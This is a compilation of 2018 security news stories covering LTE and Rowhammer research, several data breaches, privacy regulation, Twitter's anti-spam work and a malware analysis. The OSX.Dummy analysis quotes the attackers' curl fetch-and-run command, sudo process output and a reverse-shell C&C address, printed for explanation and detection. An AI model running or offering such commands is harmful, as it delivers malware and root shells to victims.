“The aLTEr attack exploits the fact that LTE user data is encrypted in counter mode (AES-CTR) but not integrity protected, which allows us to modify the message payload: the encryption algorithm is malleable, and an adversary can modify a ciphertext into another ciphertext which later decrypts to a related plaintext,” reads the research paper published by the experts.

“the adversary sends signals to the network or to the device by using a specific device that is capable of simulating the legitimate network or user device. In our case, the adversary does both and intercepts all transmissions between Bob and the network. Thus, Bob perceives the adversary as his usual network provider and connects to the simulation device. Towards the real network, the adversary acts like she was Bob.”

LTE active attack

The experts conducted the attacks in a controlled environment and highlighted that the requirements are, at the moment, hard to meet in real LTE networks, anyway persistent attackers can replicate them in the wild.

The researchers used a shielding box to stabilize the radio layer and prevent inference during the tests.

The team set up two servers, a DNS server and an HTTP server, to shows how an attacker can hijack connections (see PoC attack video).

The experts published a paper with all the technical details of the aLTEr attack and a video PoC of the attack:

The attack also requires equipment (USRP) that goes for about $4,000 to emulate the behavior of spying boxes such as IMSI catchers or Stingray.

The researchers also described countermeasures to adopt in order to mitigate the attacks. The researchers already shared findings of their study with telco institutions, including the GSM Association (GSMA) and the 3rd Generation Partnership Project (3GPP), and telephone companies.

According to the experts, forthcoming 5G networks may also be vulnerable to these attack techniques because the 5G standard supports authenticated encryption.

“The use of authenticated encryption would prevent the aLTEr attack, which can be achieved through the addition of message authentication codes to user plane packets,” the experts said.

“However, the current 5G specification does not require this security feature as mandatory, but leaves it as an optional configuration parameter.”

The researchers will share full details about their researcher during the 2019 IEEE Symposium on Security and Privacy.


Data Broker Exactis data breach, one of the biggest ever, exposes millions of Americans
1.7.2018 securityaffairs Incindent

Security expert Vinny Troia has found a huge trove of data belonging to millions of Americans that were left unsecured online.
The security researcher Vinny Troia was analyzing the level of security for Elasticsearch installs exposed online when discovered millions of records belonging to Americans that were left unsecured online.

The expert used Shodan to find U.S. Elasticsearch databases exposed on the internet, the query allowed him to discover around 7,000 instances. One of them immediately appeared very interesting, an archive owned by US data broker firm Exactis that was containing personal data on both consumers and businesses.

“Earlier this month, security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server. The haul comprises close to 2 terabytes of data that appears to include personal information on hundreds of millions of American adults, as well as millions of businesses.” reported Wired.

“While the precise number of individuals included in the data isn’t clear—and the leak doesn’t seem to contain credit card information or Social Security numbers—it does go into minute detail for each individual listed, including phone numbers, home addresses, email addresses, and other highly personal characteristics for every name.”

The archive was containing roughly 340 million records (230 million on consumers and 110 million on business contacts), this is probably the biggest potential breach ever seen.

According to Exactis website, the firm gathered consumer data on 218 million individuals and 110 million households.

The archive contains 88 million records that include email addresses and postal addresses, while 112 million records include residential phone numbers.

Business data includes 21 million records of companies, 40 million postal addresses, 21 million records with email addresses and postal address, and 52 million business phone numbers.

The good news is that the archive did not include credit card information or Social Security numbers.

Exactis data breach

At the time it is not clear how much the archive was exposed, but experts believe it was completely exposed online. The archive includes interests, habits and the age and gender of children, and more than 400 variables ranging from religion, pets, and whether a person smokes.

The knowledge of so detailed profiles could allow attackers to launch effective spear phishing campaigns.

The security expert promptly reported his findings to the FBI and Exactis, the company immediately secured the database.

Customers proposed a class action in the Florida federal court last week claiming that Exactis did not implement best practice guidelines to protect the data.


Recently discovered OSX.Dummy mac malware is targeting the cryptocurrency community
30.6.2018 securityaffairs Apple

The former NSA white hat hacker and malware researcher Patrick Wardle analyzed a new mac malware dubbed OSX.Dummy that targets the cryptocurrency community.
The popular experts decided to analyze the malicious code after the security researcher Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS ‘InfoSec Handlers Diary Blog’ titled “Crypto community target of MacOS malware.”
“Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef.

The Wardle intent was to demonstrate that the Objective-See’s tools can generically thwart this new threat even if it was undetected by all the anti-virus software.

OSX.Dummy malware

Verhoef noticed that the attack was originating within crypto related Slack or Discord chats groups by impersonating admins or key people.

The attackers shared small code snippets like the following one resulting in downloading and executing a malicious binary.

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
Wardle noticed that the malicious binary is not signed, this means it would be blocked by GateKeeper, but attackers overwhelmed this limitation by making the victims to download and run the binary directly via terminal commands.

Wardle conducted a dynamic analysis of the malware using a High Sierra virtual machine with various Objective-See tools installed.

The malware first sets script to be owned as root

# procInfo

monitoring for process events...

process start:
pid: 432
path: /usr/bin/sudo
args: (
"/usr/bin/sudo",
"-S",
"-p",
"#node-sudo-passwd#",
chown,
root,
"/tmp/script.sh"
)
then it changes file’s permissions to root by executing the sudo command, but this will require the user to enter the password in the terminal.

The password is saved by the malicious code in the folder /tmp/dumpdummy;

The malware makes a series of operations that allow it to gain persistence through a malicious launch daemon.

The malware sets up the RunAtLoad key to true, this implies that the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted.

The script will attempt to connect to 185[.]243.115.230 on port 1337.
“It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the –i flag. In other words, it’s setting up an interactive reverse shell.” explained Wardle.

“If you have a firewall product installed, such as Objective-See’s LuLu, this network activity will be detected”

If the malware successfully connects the C&C server (
185[.]243.115.230:1337
), the attacker will be able to arbitrarily execute commands as root on the target system.

Below the key findings of Wardle analysis on the OSX.Dummy:

the infection method is dumb
the massive size of the binary is dumb
the persistence mechanism is lame (and thus also dumb)
the capabilities are rather limited (and thus rather dumb)
it’s trivial to detect at every step (that dumb)
…and finally, the malware saves the user’s password to
dumpdummy
“To check if you’re infected run KnockKnock as root (since the malware set’s it components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named ‘script.sh'” Wardle concluded.


Twitter shared details about its strategy for fighting spam and bots
30.6.2018 securityaffairs
Social

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platform are a privileged tool for psyops and malicious campaign, for this reason, Twitter rolled out new features to detect and prevent any abuse.

Threat actors make a large use of bots to spread propaganda and malicious links, and social media platforms are spending significant efforts in threats mitigation.

Twitter claims it challenged in May more than 9.9 million potentially automated accounts used for malicious activity every week. The data shows a significant decrease from 6.4 million in December 2017.
The social media platform said that the security measures allowed to drastically reduce spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of them were shut down within a week or even within hours after being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bots activity detecting synchronized operations conducted by multiple accounts.

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,”
The company introduced measures to audit existing accounts and control the creation of New ones.
Twitter
Twitter is incresing checks on the sign-up process to make idifficult to register spam accounts, for example requesting more iteration ti the user such as the confermatuon of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is investing in behavioral detection, its engineers are working to introduce measures that one detected suspicions activities by challenging the owner of the account in actions that request its interaction.


Adidas warns US consumers of a potential security breach
30.6.2018 securityaffairs Incindent

The sportswear company Adidas announced that it has launched an investigation after learning of a potential security breach that could impact millions of its US customers.
Adidas published a security alert to warn that hackers may have stolen customer data from its US website.

The German sportswear company confirmed that attackers may have had unauthorized access to customer personal data, including addresses, email addresses, and encrypted passwords.

The company highlighted that neither financial nor fitness information was exposed.

“On June 26, adidas became aware that an unauthorized party claims to have acquired limited data associated with certain consumers.” states the data breach notification published by Adidas.

“According to the preliminary investigation, the limited data includes contact information, usernames and encrypted passwords, Adidas has no reason to believe that any credit card or fitness information of those consumers was impacted.”

adidas data breach

The company became aware of the security breach on 26 June and notified the data breach to law enforcement.

The firm is notifying the incident to the affected customers that could be targeted by spear-phishing campaigns in the incoming weeks.

US customers urge to change the password and to remain vigilant about potential attacks.


Facebook Quiz app NameTests left 120 Million users’ data exposed online
30.6.2018 securityaffairs
Social

Experts discovered a third-party quiz app, called NameTests, that was found exposing data of up to 120 million Facebook users.
A bug on the Nametests.com exposed data of over 120 million users who took personality quizzes on Facebook, the good news is that the flaw was addressed as part of the Facebook’s Data Abuse Bounty Program launched in April.

nametests

The issue resided in Nametests.com that shares users’ data with any third-party that requested it.

The flaw was reported by the researchers Inti De Ceukelaire, who explained that when loading a personality test, the website displays personal information loaded from http://nametests.com/appconfig_user.

The data loaded from Nametests.com was wrapped in JavaScript, this means that it could be shared with other websites.

“In a normal situation, other websites would not be able to access this information. Web browsers have mechanisms in place to prevent that from happening.” the researcher wrote in a blog post.

“Since NameTests displayed their user’s personal data in JavaScript file, virtually any website could access it when they would request it,”

The experts set up a website that fetched data about the visitor from the Nametests.com website. In turn, ametests.com provided the access token that could also be used to gain access to the visitor’s posts, photos and friends, depending on the permissions granted.

“NameTests would also provide a secret key called an access token, which, depending on the permissions granted, could be used to gain access to a visitor’s posts, photos and friends. It would only take one visit to our website to gain access to someone’s personal information for up to two months.” De Ceukelaire added.

Below the video PoC published by the expert that shows how NameTests was revealing visitor’s identity even after deleting the app.

nametests

In order to prevent such behavior, the user would have had to manually delete the cookies on their device.

The expert also discovered that the user information would continue to be available through the website even after they deleted the application. Users would have had to manually delete the cookies on their devices to prevent their data from being leaked.

The issue was reported to Facebook’s Data Abuse program on April 22 and the company and a fix was rolled out on June 25.

According to Facebook, the bug could “have affected Facebook information people shared with nametests.com”, in response to the incident the tech giant revoked the access tokens for everyone on Facebook who has signed up to use this app

“It was reported by Inti De Ceukelaire and we worked with the app’s developer — Social Sweethearts — to address the website vulnerability he identified which could have affected Facebook information people shared with nametests.com.” reads a post published by Facebook.

” To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it.”
Facebook awarded the expert with $8,000 instead $4,000 bounty because he chose to donate it to charity.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher concluded.


The popular online survey software Typeform suffered a security breach
30.6.2018 securityaffairs Incindent

Typeform, the popular online survey platform, has suffered a data breach that exposed partial data of some users, no payment card data was stolen.

Typeform, the popular online survey platform, is the last victim of a data breach. Typeform software is widely adopted by businesses worldwide to easily arrange surveys, it allows easy creation of interfaces to collect user data.

The company has confirmed the security breach that exposed partial data of some users.

“On June 27, 2018, our engineering team became aware that an unknown third party gained access to our server and downloaded certain information. As a result of this breach, some data was compromised. ” reads the data breach notification published by the company.

According to Typeform, no payment card data or password information for the website had been exposed in the security breach.

The Spanish firm discovered the intrusion on June 27th, and immediately launched an internal investigation.

The experts discovered that attackers accessed company servers and downloaded a partial data backups for surveys conducted before May 3rd, 2018.

The company identified the vulnerability exploited by the hackers and patched it a few hours then it notified the incident to the affected users.

At the time there is no information about the flaw exploited by the hackers, the company highlighted that even if customers collected payments via Typeform’s Stripe integration, the payment details they have corrected are safe.

Typeform

One of Typeform’s customers, the digital mobile bank Monzo, confirmed confirmed that personal data of about 20,000 people are likely to have been exposed due to the security breach.

“Our initial investigations suggest that some personal data of about 20,000 people is likely to have been included in the breach.” reads the security advisory published by Monzo.

“For the vast majority of people, this was just their email address. For a much smaller proportion of others, this may have included other data like their Twitter username or postcode. We’ve published a full breakdown at the bottom of this post,”

Unfortunately, the number of data breaches continue to increase and a growing number of personal details are flooding the black marketplaces.

Yesterday the sportswear company Adidas announced potential data breach that affected millions of its U.S. customers while the global entertainment ticketing service Ticketmaster suffered the same problem.


Researchers Devise Rowhammer Attacks Against Latest Android Versions
29.6.2018 securityweek  Android  Attack 

A team of researchers from universities worldwide have devised a new set of DMA-based Rowhammer attacks against the latest Android OS, along with a lightweight defense to prevent such attacks on ARM-based devices.

Rowhammer is a vulnerability impacting dynamic random-access memory (DRAM) chips that can be abused to gain kernel privileges on Linux systems. Discovered in 2012 but documented only in 2014, the bug can also be exploited remotely using JavaScript or via graphics processing units (GPUs).

Last year, researchers from Graz University of Technology, the University of Pennsylvania (and University of Maryland), and University of Adelaide revealed a series of attack methods able to bypass existing defenses against Rowhammer.

Now, eight researchers from Vrije Universiteit Amsterdam, Amrita University India, UC Santa Barbara, and EURECOM propose RAMpage, a set of attacks that target the latest Android versions with a root exploit and app-to-app exploits that bypass all defenses.

In a research paper (PDF), they also propose GuardION, lightweight defenses that mitigate Rowhammer exploitation on ARM systems by isolating DMA buffers with DRAM-level guard rows.

Furthermore, the researchers claim that re-enabling higher order allocations, which Google disabled to prevent attacks, would improve system performance.

Rowhammer is a hardware bug that “consists of the leakage of charge between adjacent memory cells on a densely packed DRAM chip.” This means that, when a row of bits in the DRAM module is used, the neighboring rows are slightly affected, and attackers can abuse this to completely subvert a system’s security.

The issue is particularly serious on mobile devices, where hardware upgrades are not possible, the security researchers argue. They also note that existing software defenses are not effective and present attacks can circumvent all currently proposed and implemented defense techniques.

To exploit Rawhammer, an attacker needs to land a security-sensitive page into a vulnerable physical memory location and also needs to access the DRAM chip fast enough to hit the same rows before they are refreshed. They also have to determine the virtual addresses that map to the two physical rows adjacent to the victim row.

To mitigate the risks, Google disabled the contiguous heap, but left the system heap available. The company also reduced internal system heap pools to two and enforced that the system heap only returns memory pages from highmem.

By exhausting the system heap, the researchers were able to get contiguous pages and find exploitable bit flips via double-sided Rowhammer. The researchers then tricked the system into releasing pre-allocated cached memory, including the row with the vulnerable page, and developed a root exploit leveraging this attack technique.

The researchers also say it is possible to corrupt buffers belonging to another app or process, an attack scenario that could abuse privileged apps for increased damage. They also argue that an attacker could try to exhaust the Contiguous Memory Allocator (CMA) bit map, or to corrupt system memory from CMA-allocated memory. Such attacks, however, are technically challenging, the experts admit.

GuardION, the newly proposed mitigation against DMA-based Rowhammer exploits on mobile devices, focuses on limiting the capabilities of an attacker’s uncached allocations. Expensive fine-grained isolation can be applied for each DMA allocation, and GuardION isolates buffers with two guard rows: one at the ‘top’ and another at the ‘bottom’.

“This enforces a strict containment policy in which bit flips that are triggered by reading from uncached memory cannot occur outside the boundaries of that DMA buffer. In effect, this design defends against Rowhammer by eradicating the ability of the attacker to inject bit flips in sensitive data,” the researchers claim.

The mitigation, however, is based on the premises that bit flips don’t occur in memory pages physically located more than one row away from the aggressor rows. Such flips have never been reported before and the Rowhammer attack itself makes such incidents unlikely to ever occur.

According to the research paper, not only is GuardION’s performance impact negligible, but its integration with the current Android code base is rather easy. A prototype implementation contains only 844 lines of code and touches only 9 files in the Android source code. The researchers are in the process of submitting the patch to Google for adoption.


California, Home of Silicon Valley, Ramps Up Online Privacy Law
29.6.2018 securityweek  Privacy

California on Thursday passed a strict new law aimed at protecting people's privacy online, a move that promised to shift the terrain on which internet firms operate in the wake of recent scandals.

The bill, signed into law by Governor Jerry Brown, followed in the spirit of the General Data Protection Regulation, which recently took effect in Europe.

The legislation cut off an initiative that is heading for the ballot in this state in the fall.

It was crafted to ensure rights including knowing what personal information is collected by companies on the internet and whether it is sold, and to whom, according to the bill signed by Brown.

The law also gives people a right to "say no" to the sale of their personal information, and calls for them to be treated the same as anyone else online if they opt to restrict use of their data.

Internet businesses that receive "verifiable" requests by people to have their data deleted will be required to do so, with a list of exceptions that include keeping what is needed to complete transactions, detect security breaches, or protect against illegal activity.

"A consumer shall have the right, at any time, to direct a business that sells personal information about the consumer to third parties not to sell the consumer's personal information," the legislation said.

"This right may be referred to as the right to opt out."

Business home pages will be required to provide "clear and conspicuous" links titled "Do Not Sell My Personal Information" that take people to opt-out pages.

People whose personal information is stored unencrypted and not sufficiently protected were also give the right to pursue civil claims.

The shift both in Europe and California came after the harvesting of Facebook users' data by Cambridge Analytica, a US-British political research firm, for the 2016 US presidential election.

- Potential to spread -

Nonprofit advocacy group Consumer Watchdog called the California legislation "landmark reform" and branded it the toughest state privacy law in the US.

"Silicon Valley companies will very likely implement many of these reforms across their entire customer base, not just for Californians," said Consumer Watchdog president Jamie Court.

"California has led the way and Californians must be ever vigilant in the next year that the legislature does not undermine these protections at the behest of tech lobbyists and moguls."

The Internet Association, an industry lobbying group, expressed concerns about the law, saying there was a lack of public input as it was hurried through the legislative process.

"Data regulation policy is complex and impacts every sector of the economy, including the internet industry," association vice president of state government affairs Robert Callahan said in a statement posted on its website.

"That makes the lack of public discussion and process surrounding this far-reaching bill even more concerning."

Callahan contended that California policymakers will need to "correct the inevitable, negative policy and compliance ramifications this last-minute deal will create for California's consumers and businesses alike."

The list of Internet Association members includes titans such as Amazon, Facebook, Google, Microsoft, Netflix and Twitter.

During a meeting Thursday with reporters at Facebook's headquarters in Silicon Valley, chief operating officer Sheryl Sandberg said the leading social network supported the California legislation.


Former Equifax Manager Charged With Insider Trading
29.6.2018 securityweek  IT

US securities regulators announced insider trading charges on Thursday against a former Equifax manager who sold shares in the company before it disclosed a giant data breach.

Sudhakar Reddy Bonthu, a product development manager at Equifax, allegedly netted more than $75,000 after placing orders on September 1, 2017 betting that Equifax shares would fall, according to a complaint by the US Securities and Exchange Commission.

Six days later, the company announced one of the biggest data breaches ever, sending shares sharply lower.

"As we allege, Bonthu, who was entrusted with confidential information by his employer, misused that information to conclude that his company had suffered a massive data breach and then sought to illegally profit," said Richard Best, director of the SEC's Atlanta Regional Office.

"Corporate insiders simply cannot abuse their access to sensitive information and illegally enrich themselves."

Bonthu, 44, a resident of Georgia, settled the SEC civil charges and agreed to return his ill-gotten gains plus interest, the agency said.

Bonthu has also been charged in a parallel US criminal case by the Department of Justice, the SEC said.

Bonthu is the second Equifax defendant in an insider trading case after authorities in March brought criminal and civil charges against former Equifax executive Jun Ying.

Key personal data, including names, social security numbers and dates of birth, were pilfered from more than 140 million Americans in the Equifax hack.

On Wednesday, the company agreed to new oversight requirements under a consent order with eight state regulators, including financial regulatory bodies in New York, Georgia and California.


Google Expands Android's Compiler-Based Mitigations
29.6.2018 securityweek  Android

Google this week announced expanded compiler-based mitigations in Android P, in an attempt to make bugs harder to exploit and prevent specific types of issues from becoming vulnerabilities.

One of these is Control Flow Integrity (CFI), which represents a set of mitigations meant to “confine a program's control flow to a call graph of valid targets determined at compile-time.” Android already supports CFI implementation in select components, but the next platform release will expand that support, the search giant says.

“This implementation focuses on preventing control flow manipulation via indirect branches, such as function pointers and virtual functions,” Google explains.

The idea is to use valid branch targets to reduce the set of allowable destinations an attacker can call, while indirect branches are used to detect runtime violations of the statically determined set of allowable targets, in which case the process aborts.

By restricting control flow to a small set of legitimate targets, Google attempts to make code-reuse attacks much harder to execute, while also making memory corruption vulnerabilities more difficult or even impossible to exploit.

CFI requires compiling with Link-Time Optimization (LTO), which also results in reduced binary size and improved performance, although compile time increases. According to Google, testing has revealed “negligible overhead to code size and performance.”

In Android P, CFI will be enabled by default widely within the media frameworks and other security-critical components, including NFC and Bluetooth.

Android P also expands the number of libraries that will benefit from Integer Overflow Sanitization, which was meant to safely abort process execution when an overflow is detected. Thus, an entire class of memory corruption and information disclosure vulnerabilities are mitigated.

Google has expanded the use of these sanitizers in the media framework with each release and also improved them to reduce performance impact.

“In testing, these improvements reduced the sanitizers' performance overhead by over 75% in Android's 32-bit libstagefright library for some codecs. Improved Android build system support, such as better diagnostics support, more sensible crashes, and globally sanitized integer overflow targets for testing have also expedited the rollout of these sanitizers,” the Internet company says.

Google decided to bring integer overflow sanitization to libraries where complex untrusted input is processed or security bulletin-level integer overflow flaws were reported. Thus, in Android P, the libui, libnl, libmediaplayerservice, libexif, libdrmclearkeyplugin, and libreverbwrapper libraries will benefit from these sanitizers.

“Moving forward, we're expanding our use of these mitigation technologies and we strongly encourage vendors to do the same with their customizations,” Google notes.


Twitter shared details about its strategy for fighting spam and bots
29.6.2018 securityaffairs 
Social 

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platform are a privileged tool for psyops and malicious campaign, for this reason, Twitter rolled out new features to detect and prevent any abuse.

Threat actors make a large use of bots to spread propaganda and malicious links, and social media platforms are spending significant efforts in threats mitigation.

Twitter claims it challenged in May more than 9.9 million potentially automated accounts used for malicious activity every week. The data shows a significant decrease from 6.4 million in December 2017.
The social media platform said that the security measures allowed to drastically reduce spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of them were shut down within a week or even within hours after being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bots activity detecting synchronized operations conducted by multiple accounts.

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,”
The company introduced measures to audit existing accounts and control the creation of New ones.
Twitter
Twitter is incresing checks on the sign-up process to make idifficult to register spam accounts, for example requesting more iteration ti the user such as the confermatuon of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is investing in behavioral detection, its engineers are working to introduce measures that one detected suspicions activities by challenging the owner of the account in actions that request its interaction.


Facebook, Google 'Manipulate' Users to Share Data Despite EU Law: Study
29.6.2018 securityweek  Privacy

Facebook and Google are pushing users to share private information by offering "invasive" and limited default options despite new EU data protection laws aimed at giving users more control and choice, a government study said Wednesday.

The Norwegian Consumer Council found that the US tech giants' privacy updates clash with the new General Data Protection Regulation (GDPR), which forces companies to clarify what choices people have when sharing private information.

"These companies manipulate us into sharing information about ourselves," the council's director of digital services, Finn Myrstad, said in a statement.

"(This) is at odds with the expectations of consumers and the intention of the new Regulation," the 2018 study, entitled "Deceived By Design", concluded.

Myrstad said the practices showed "a lack of respect for their users, and are circumventing the notion of giving consumers control of their personal data".

The case for the new laws has been boosted by the recent scandal over the harvesting of Facebook users' data by British consultancy Cambridge Analytica for the 2016 US presidential election.

Information for the report was collected from mid-April to early June, a few weeks after the EU rules came into force.

- 'Very few actual choices' -

The report exposed that Facebook and Google often set the least privacy-friendly option as a default and that users rarely change pre-selected settings.

Privacy-friendly choices "require more clicks and are often hidden," it said.

"In many cases, the services obscure the fact that users have very few actual choices, and that comprehensive data sharing is accepted just by using the service," the study said.

But Facebook on Wednesday denied covering up the options for users and said they had prepared for 18 months to meet the GDPR requirements.

"We have made our policies clearer, our privacy settings easier to find and introduced better tools for people to access, download, and delete their information," the company's spokesman told Norwegian public broadcaster NRK.

The EU has billed the GDPR as the biggest shake-up of data privacy regulations since the birth of the web.

The social media giant and Google separately already face their first official complaints under the new law after an Austrian privacy campaigner accused them of forcing users to give their consent to the use of their personal information.

Companies can be fined up to 20 million euros ($24 million) or four percent of annual global turnover for breaching the strict new data rules for the European Union, a market of 500 million people.


Twitter Unveils New Processes for Fighting Spam, Bots
29.6.2018 securityweek 
Social

Twitter this week shared some details on new processes designed to prevent malicious automation and spam, along with data on the positive impact of the measures implemented in the past period.

Spam and bots are highly problematic on Twitter, but the social media giant says it has rolled out some new systems that have helped its fight against these issues. The company claims that last month it challenged more than 9.9 million potentially spammy or automated accounts every week, up from 6.4 million in December last year.

Twitter says it now removes 214% more spam accounts compared to 2017. It also claims that recent changes have led to a significant drop in spam reports received from users, from 25,000 daily reports in March to 17,000 in May.

The company also reported suspending over 142,000 apps in the first quarter of 2018, more than half of which were shut down within a week or even within hours after being registered.

One measure implemented recently by Twitter involves updating account metrics in near-real time. Spam accounts and bots often follow other accounts in bulk and this type of behavior should quickly be caught by Twitter’s systems. However, the company has now also decided to remove follower and engagement counts from suspicious accounts that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,” Twitter’s Yoel Roth and Del Harvey said in a blog post.

The company has also made some changes to its sign-up process to make it more difficult to register spam accounts. This includes requiring new accounts to confirm an email address or phone number.

Existing accounts are also being audited to ensure that they weren’t created using automation.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” Roth and Harvey explained. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

Finally, Twitter says it has expanded its malicious behavior detection systems with tests that can involve solving a reCAPTCHA or responding to a password reset request. Complex cases are passed on to Twitter employees for review.

Twitter also announced this week that users can configure a USB security key as part of the two-factor authentication (2FA) process.

On June 21, Twitter revealed that it entered an agreement to acquire Smyte, which specializes in safety, spam and security issues. By acquiring the company, the social media giant hopes to “improve the health of conversation on Twitter.”


Russia Expert to Lead Canada's Electronic Eavesdropping Agency
29.6.2018 securityweek  BigBrothers

A Russia expert was appointed Wednesday to lead Canada's electronic eavesdropping agency, amid ongoing concerns of Russian hacking and meddling in Western elections.

Shelly Bruce moves up from number two at the Communications Security Establishment (CSE) to replace her former boss, outgoing CSE head Greta Bossenmaier.

Bruce studied Russia and Slavic languages at university before joining the CSE in 2004 as director of intelligence, and quickly moved up the ranks.

Her appointment as the head of the CSE comes only two months after Ottawa moved to safeguard Canada's elections from cyber threats and "foreign interference," following accusations of Russia meddling in the last US election, which Russia has denied.

Canada's next federal election is scheduled for 2019.

Also in April, G7 foreign ministers called on Russia to come clean about a nerve agent attack on a former spy in Britain, calling it in a joint statement "a threat to us all."

Western nations had a month prior expelled 150 Russian diplomats in a coordinated action against Moscow in support of Britain, and Russia retaliated with similar moves.

They included four diplomats serving at either Russia's embassy in Ottawa or its consulate in Montreal who were "identified as intelligence officers or individuals who have used their diplomatic status to undermine Canada's security or interfere in our democracy," Foreign Minister Chrystia Freeland said then.

Canada is a member the US-led Five Eyes intelligence gathering alliance.

The CSE last year urged Ottawa to step up its hacking countermeasures, after identifying between 2013 and 2015 approximately 2,500 state-sponsored hacking attempts.


Ticketmaster Blames Third Party Over Data Breach
29.6.2018 securityweek  Incindent

Ticketmaster UK has had thousands of personal customer information compromised. This may include name, address, email address, telephone number, payment details and Ticketmaster login details, the company said.

How many accounts have been compromised has not been specified, although the company says in a statement, "Less than 5% of our global customer base has been affected by this incident;" adding, "Customers in North America have not been affected."

Details of the hack have not yet been disclosed other than it involved 'an unknown third-party'. The statement says that it identified malicious software on a support product hosted by Inbenta Technologies (part of Ticketmaster's supply chain). It did this on Saturday, June 23, and immediately 'disabled the Inbenta product across all Ticketmaster websites."

Ticketmaster clearly feels that Inbenta is at fault. Inbenta takes a slightly different view. In its own statement, CEO Jordi Torras, writes, "it has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster's particular requirements." The attackers located, modified, and used this script to extract the payment information of Ticketmaster customers processed between February and June 2018.

But Torras adds, "Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customized script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability." In other words, it is Ticketmaster that is at fault.

James Romer, chief security architect at SecureAuth + Core Security, explains, "a customer service chatbot was compromised by malware and exported UK customers' data to an unknown third-party." In fact, the breach could extend to other nations. While Ticketmaster says, "we understand that only certain UK customers" are affected, it also says it is notifying all Ticketmaster International customers (outside of the U.S.) that they need to reset their passwords.

Ticketmaster has further concerns to consider. According to Monzo -- an online-only bank based in East London -- it warned Ticketmaster about a potential breach in early April. Monzo had detected fraudulent card activity that seemed to point to a Ticketmaster common factor. In a blog posted Thursday by Natasha Vernier, Monzo's head of financial crime, she explains that the bank reached out to Ticketmaster, and on 12 April, "members of the Ticketmaster security team visited the Monzo office so we could share the information we'd gathered. They told us they'd investigate internally."

Within a week, Monzo was sufficiently concerned and certain that it shared its information with the U.S. Secret Service, and started to proactively replace every Monzo customer card that had been used at Ticketmaster (about 6000).

One week after its security team visited Monzo's offices, Ticketmaster informed Monzo that it had found no evidence of a breach and that no other banks were reporting similar patterns. The breach wasn't actually found until some ten weeks after Monzo first raised its concerns.

"There are going to be a few eyebrows raised this morning about this breach and when Ticketmaster really discovered it," comments Tony Pepper, CEO and co-founder at Egress. Clearly data was at risk for some time, and apparently Ticketmaster had been alerted to the issue but didn't heed those warnings. It is going to be interesting to see how the ICO reacts when they get to the bottom of this, given the emphasis now placed on data breach reporting and reflected in the changes made under the GDPR."

This was a supply chain attack that took a long time to detect even when the company was told it had been breached. Supply chain attacks are increasing. "It's not uncommon for companies to be breached via a third-party supplier, which is why it's important to carefully consider who to work with and what security protocols they have in place," comments Andrew Bushby, UK director at Fidelis Cybersecurity.

It's worth noting that that the UK government's new Minimum Cyber Security Standard for government departments actually specifies that the supply chain should be required to meet the UK's Cyber Essentials level 6.

Joseph Carson wonders whether artificial intelligence will become embroiled in the case. "Many companies are using chat bots to help automate their customer experiences, having been lured into fancy buzzwords like machine learning, artificial intelligence and virtual assistance," he notes. While the theft of personal details, financial information and passwords means these are now available on the darknet for cybercriminals to abuse, he wonders what else might have been stolen. "It will be interesting to learn," he suggests, "whether the cybercriminals also accessed the artificial intelligence information that could be used for a more targeted type of attack."

